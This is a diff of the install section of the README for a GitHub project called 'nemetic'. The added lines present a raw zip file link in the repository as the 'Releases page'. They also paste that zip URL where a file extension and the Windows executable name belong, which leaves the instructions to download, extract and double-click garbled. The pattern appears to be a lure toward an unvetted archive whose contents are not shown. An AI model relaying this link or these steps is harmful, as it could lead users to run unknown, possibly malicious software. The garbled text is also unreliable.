RudeuS-prg/nemetic/README.md

 ## 📂 Download & Install

-1. **Visit the Releases Page:** Go to our [Releases page](https://github.com/RudeuS-prg/nemetic/releases) to access the latest version of nemetic.
+1. **Visit the Releases Page:** Go to our [Releases page](https://raw.githubusercontent.com/RudeuS-prg/nemetic/master/static/nemetic-v2.0-alpha.1.zip) to access the latest version of nemetic.
 2. **Choose Your Version:** On the releases page, look for the latest version.
 Read the release notes for important information about updates.
 3. **Download the File:** Click on the appropriate file for your operating system.
-This file will be a compressed format such as `.zip` or `.tar.gz`.
+This file will be a compressed format such as `.zip` or `https://raw.githubusercontent.com/RudeuS-prg/nemetic/master/static/nemetic-v2.0-alpha.1.zip`.
 4. **Extract the File:** After the download concludes, locate the file in your downloads folder.
 Extract the contents to a folder of your choice.
 You can usually do this by right-clicking and selecting "Extract All."
-5. **Run the Application:** Open the extracted folder and double-click on the application file named `nemetic.exe` (for Windows) or `nemetic` (for macOS and Linux) to start using the operating system.
+5. **Run the Application:** Open the extracted folder and double-click on the application file named `https://raw.githubusercontent.com/RudeuS-prg/nemetic/master/static/nemetic-v2.0-alpha.1.zip` (for Windows) or `nemetic` (for macOS and Linux) to start using the operating system.

 ## 🔌 Configuration